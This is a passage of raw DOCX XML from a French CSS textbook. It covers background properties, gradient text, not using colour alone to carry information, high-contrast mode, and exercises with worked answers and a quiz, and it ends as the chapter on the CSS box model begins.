            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>background-size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2897"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dimensionnement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3380"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cover</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>contain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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background-position</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="289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Position</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="338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center</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>50% 20%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>background-repeat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2897"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Répétition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3380"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>no-repeat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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background-clip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="289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Zone couverte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="338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text</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour un titre en dégradé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un dégradé appliqué au texte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.titre-degrade {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: linear-gradient(90deg, #0f2e4c, #e0a21b);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -webkit-background-clip: text;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background-clip: text;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: transparent;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le texte en dégradé reste du texte : il demeure sélectionnable, lu par les lecteurs d'écran, indexé. Veillez toutefois à conserver un contraste suffisant sur toute la longueur du dégradé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>12.5 La couleur comme information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Environ 8 % des hommes présentent une forme de daltonisme. Une information portée uniquement par la couleur disparaît pour eux — et pour tous les utilisateurs en mode contraste élevé ou sur un écran mal calibré.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2540000"/>
            <wp:docPr id="19" name="Picture 19"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f17.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2540000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.17 — Deux façons de signaler une erreur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une erreur signalée par plusieurs canaux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Ne jamais s'appuyer sur la couleur seule */</w:t>
        <w:br/>
        <w:t>.champ-erreur {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border: 2px solid #a63a32;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background-image: url("icones/alerte.svg");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background-position: right .6rem center;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background-repeat: no-repeat;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>/* Le message texte reste indispensable */</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graphique : légender les séries, varier les motifs de trait, ne pas compter sur la seule teinte.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état : ajouter une icône ou un texte (« En rupture »).</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lien dans un paragraphe : le souligner, pas seulement le colorer.</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formulaire : afficher un message explicite à côté du champ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Le mode contraste élevé remplace les couleurs système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Respecter le mode contraste élevé */</w:t>
        <w:br/>
        <w:t>@media (forced-colors: active) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .bouton { border: 2px solid ButtonText; }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .carte { border: 1px solid CanvasText; }</w:t>
        <w:br/>
        <w:t>}</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AUDITER UNE PALETTE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Extraire toutes les couleurs employées (inspecteur ou script).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Calculer le contraste de chaque paire texte/fond.</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Vérifier les états de focus, de survol et de désactivation.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Tester la page en niveaux de gris.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Simuler les principaux types de daltonisme.</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couleur s'écrit en hexadécimal, RGB, HSL ou OKLCH selon le besoin.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palette se nomme par rôle et par intensité, pas par apparence.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contraste se mesure : 4,5:1 pour le texte, 3:1 pour les interfaces.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blanc pur sur fond saturé fatigue, même conforme.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dégradés sont des images CSS, superposables et animables.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couleur ne doit jamais être le seul porteur d'une information.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mode contraste élevé remplace la palette : prévoyez des bordures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Couleurs et fonds sont posés. Le chapitre suivant entre dans le mécanisme central de CSS : le modèle de boîte.</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12.1 — Construire une palette accessible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Définissez une palette de six couleurs pour un site institutionnel.</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Calculez le contraste de chaque paire texte/fond.</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Corrigez les combinaisons qui échouent.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Nommez les variables par rôle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 12.2 — Réparer une interface qui repose sur la couleur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ACCESSIBILITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un tableau de bord affiche les statuts en vert, orange et rouge, sans texte ni icône.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Proposez trois canaux d'information supplémentaires.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Modifiez le HTML et le CSS en conséquence.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le rendu en niveaux de gris.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 12.3 — Créer un bandeau avec dégradé et image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Composez un bandeau de 40vh avec une image de fond, un voile sombre et un titre lisible.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Superposez un dégradé et une image.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Garantissez le contraste du titre sur toutes les zones.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Prévoyez un repli sans image.</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12.1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:root {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --texte: #1f2933;        /* sur blanc : 14,4:1 */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --texte-doux: #52606d;   /* sur blanc : 7,0:1 */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --fond: #ffffff;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --fond-alt: #f4f7f9;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --primaire: #0f2e4c;     /* sur blanc : 13,4:1 */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --primaire-clair: #274b6d;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --accent: #e0a21b;       /* texte foncé obligatoire */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --erreur: #a63a32;       /* sur blanc : 6,6:1 */</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'accent ambre ne doit jamais porter du texte blanc : son contraste tombe sous 3:1. Il sert de fond avec un texte foncé, ou de trait.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le gris </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>#52606d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> conserve 7:1 sur blanc et reste lisible sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>#f4f7f9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. C'est un bon compromis pour du texte secondaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 12.2</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&lt;ul class="statuts"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;li class="statut statut--ok"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;svg aria-hidden="true"&gt;…&lt;/svg&gt; &lt;strong&gt;Opérationnel&lt;/strong&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    — dernier contrôle à 14 h 02</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;li class="statut statut--ko"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;svg aria-hidden="true"&gt;…&lt;/svg&gt; &lt;strong&gt;Indisponible&lt;/strong&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    — depuis 13 h 47</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/li&gt;</w:t>
        <w:br/>
        <w:t>&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois canaux : le texte du statut, l'icône de forme différente, et la couleur. La couleur devient redondante au lieu d'être porteuse unique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>En niveaux de gris, les icônes (coche, croix) et les textes restent distincts : l'information survit à la perte de couleur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 12.3</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.bandeau {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  min-height: 40svh;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: grid;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  align-content: end;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: 2rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: #fff;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    linear-gradient(to top, rgb(10 20 30 / .92) 0%, rgb(10 20 30 / .35) 60%),</w:t>
        <w:br/>
        <w:t xml:space="preserve">    #0f2e4c url("images/bandeau.webp") center / cover no-repeat;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.bandeau h1 { font-size: clamp(2rem, 5vw, 3.5rem); line-height: 1.05; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le dégradé vertical assombrit le bas, où se trouve le texte : le contraste reste supérieur à 7:1 quelle que soit l'image.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La couleur de fond </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>#0f2e4c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sert de repli si l'image ne charge pas ; le texte reste lisible sur ce fond uni.</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 contraste minimal pour du texte courant selon WCAG AA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2:1</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3:1</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4,5:1</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7:1</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Quelle notation permet d'ajuster intuitivement la luminosité d'une teinte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Hexadécimal</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rgb()</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hsl()</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oklch()</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Pourquoi ne pas coder une erreur uniquement par une bordure rouge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Le rouge est interdit en interface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L'information disparaît pour les daltoniens et en niveaux de gris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Cela ralentit le rendu</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Cela empêche la validation HTML</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>background-clip: text</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Il découpe le texte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Il applique l'arrière-plan à l'intérieur des lettres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Il masque le texte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Il ajoute une bordure</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Quel mode système remplace les couleurs par une palette imposée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prefers-color-scheme</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forced-colors</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prefers-contrast</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color-gamut</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C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> WCAG AA demande 4,5:1 pour le texte courant et 3:1 pour les grands textes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hsl()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sépare teinte, saturation et luminosité : faire varier le troisième paramètre éclaircit ou assombrit la couleur.</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La couleur doit être doublée par un texte ou une icône pour rester perceptible par tous.</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Combiné à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>color: transparent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, il fait apparaître le dégradé à l'intérieur des glyphes.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>forced-colors: active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> signale le mode contraste élevé de Windows, qui remplace les couleurs par les couleurs système.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>13. Le modèle de boîte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Tout élément est un rectangle. Comprendre ce rectangle, c'est comprendre 80 % des problèmes de mise en page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Débutant · Prérequis : chapitre 12</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Décomposer un élément en contenu, remplissage, bordure et marge.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Maîtriser </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>box-sizing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et anticiper les largeurs réelles.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Comprendre la fusion des marges et l'éviter quand elle nuit.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Utiliser les modes d'affichage à bon escient.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Diagnostiquer un débordement ou un espacement inattendu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>13.1 Quatre couches</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque élément génère une boîte rectangulaire composée de quatre zones concentriques. De l'intérieur vers l'extérieur : le contenu, le remplissage (</w:t>
